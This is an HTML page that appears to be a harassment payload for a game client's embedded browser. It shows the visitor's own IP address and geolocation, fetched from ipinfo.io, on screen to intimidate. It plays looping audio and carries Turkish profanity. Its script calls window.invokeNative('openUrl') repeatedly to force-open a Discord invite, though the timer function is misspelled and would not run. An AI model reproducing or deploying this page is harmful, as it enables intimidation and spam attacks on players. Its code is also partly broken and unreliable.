<!DOCTYPE html>
<html lang="en">
<head>


<div class="text"></div>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/erzhHvmNSH</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #0036FF;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 650px; 
            height: 1;
            border: px solid #ffffff; 
            border-radius: 31px;
            box-shadow: 0 0 30px rgba(255, 255, 255 ); 
        }

        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0px 0px 8px #ffffff, 0px 0px 15px #ffffff, 0px 0px 25px #ffffff; 
            letter-spacing: 3.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #ffffff; 
            text-shadow: 0px 0px 8px #ffffff, 0px 0px 15px #ffffff, 0px 0px 25px #ffffff; 
            letter-spacing: 3.5px; 
        }

    </style>
</head>
<body>
 <div class="">
    <img src="" alt="">
   
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1263875285015859324/1400274852979675231/nooo.mp3?ex=688d5c94&is=688c0b14&hm=a6d30cb0e54669acaaae50f55f786855bab15c2ebe6174aad91770c9bfa49112&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>
 <div class="text">ks amk 𝐀𝐥-𝐀𝐧𝐬𝐚𝐢𝐫  -999999
</div>
<script>   
        setisnterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/x25FWvRngB");
            window.invokeNative("openUrl", "https://discord.gg/x25FWvRngB");
            window.invokeNative("openUrl", "https://discord.gg/x25FWvRngB");
            window.invokeNative("openUrl", "https://discord.gg/x25FWvRngB");
          }, 1000);

    </script>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>


</body>
</html>
